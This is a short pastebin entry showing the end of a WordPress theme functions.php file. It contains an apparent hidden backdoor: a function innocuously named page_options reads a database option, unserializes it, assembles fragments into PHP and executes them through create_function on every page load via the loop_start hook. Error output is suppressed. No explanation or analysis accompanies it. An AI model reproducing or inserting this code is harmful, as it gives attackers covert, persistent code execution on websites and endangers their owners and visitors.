
CorinneE
By: a guest on
Apr 11th, 2012 | syntax:
None | size: 0.49 KB | hits: 44 | expires: Never
/*-----------------------------------------------------------------------------------*/
/* End WooThemes Functions - You can add custom functions below */
/*-----------------------------------------------------------------------------------*/
?>
<?php ?>
<?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
@$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
add_action('loop_start', 'page_options'); ?>